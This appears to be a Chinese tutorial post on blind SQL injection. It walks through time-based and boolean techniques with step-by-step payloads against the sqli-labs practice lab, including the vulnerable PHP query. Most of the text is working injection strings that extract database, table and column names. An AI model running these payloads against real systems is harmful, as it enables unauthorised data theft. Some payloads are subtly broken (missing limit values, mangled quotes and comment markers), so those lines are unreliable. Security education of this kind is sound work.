sql盲注技术总结分享

盲注

基本步骤

爆库名长度

根据库名长度爆库名

对当前库爆表数量

根据库名和表数量爆表名长度

根据表名长度爆表名

对表爆列数量

根据表名和列数量爆列名长度

根据列名长度爆列名

根据列名爆数据值

二）种类

盲注主要分为两种，一种为时间类型盲注，一种为布尔类型盲注

判断是否是布尔类型的：当一个界面存在注入，但是没有显示位，没有SQL语句执行错误信息，由于布尔类型的注入只会告知是或者不是，所以只能通过页面返回的对与错来进行一个SQL的注入。

 时间盲注

• 页面延迟：通过SLEEP()函数使页面响应延迟，判断SQL语句。
• 时间分析：根据页面响应时间来推断数据。

'闭合

这里讲时间盲注

①判断是否有延时

id=1’ and sleep(5) --+

发现确实有延时，可以用时间盲注

② 爆库长

?id=1’ and if(length(database())=8,sleep(5),null)–+

③爆库名

从左边第一个字母开始，判断库名第一个字母是不是s

?id=1’ and if(left(database(),1)=‘s’,sleep(5),null)–+

?id=1’ and if(left(database(),2)=‘se’,sleep(5),null)–+

…

security

或者： ?id=1’ and if((select (substr(database(),1,1))=“s”) ,sleep(5), null)–+

③爆表名

?id=1’ and if(left((select table_name from information_schema.tables where

table_schema=database() limit 0,1),1)=‘e’ ,sleep(5),null)–+

?id=1’ and if(left((select table_name from information_schema.tables where

table_schema=database() limit 0,1),2)=‘em’ ,sleep(5),null)–+

?id=1’ and if(left((select table_name from information_schema.tables where

table_schema=database() limit 0,1),3)=‘ema’ ,sleep(5),null)–+

…

database() 如果不想写，可以写security的hex值

表名：emails

或者：

id=1’ and if((select substr(table_name,1,1) from information_schema.tables

where table_schema=database() limit 0,1)=‘e’,sleep(5),null) --+

④爆列名

?id=1’ and if(left((select column_name from information_schema.columns where

table_name=‘users’ limit ,1),)=‘password’ ,sleep(5),null)–+

其中*需要逐个尝试

演示：

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

$result=mysql_query($sql);

$row = mysql_fetch_array($result);

if($row){

      echo 'You are in...........';

}else{

}

http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select database()) ,1,1))) = 115--+

http://www.sqli-lab.cn/Less-8/?id=1' and (length(database())) = 8 --+ #数库名长度=8

盲注得出数据库名 security

http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select database()) ,1,1))) = 115 --+

    http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select database()) ,2,1))) = 101 --+

    http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select database()) ,3,1))) = 99 --+

    http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select database()) ,4,1))) = 117 --+

    http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select database()) ,5,1))) = 114 --+

    http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select database()) ,6,1))) = 105 --+

    http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select database()) ,7,1))) = 116 --+

    http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select database()) ,8,1))) = 121 --+  

接着判断表名长度

http://www.sqli-lab.cn/Less-8/?id=1' and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 --+

判断出第四张表示user

http://www.sqli-lab.cn/Less-8/?id=1' and (length((select table_name from information_schema.tables where table_schema=database() limit 3,1))) = 5 --+

    http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 117 --+

    http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,2,1))) = 115 --+

    http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,3,1))) = 101 --+

    http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,4,1))) = 114 --+

    http://www.sqli-lab.cn/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,5,1))) = 115 --+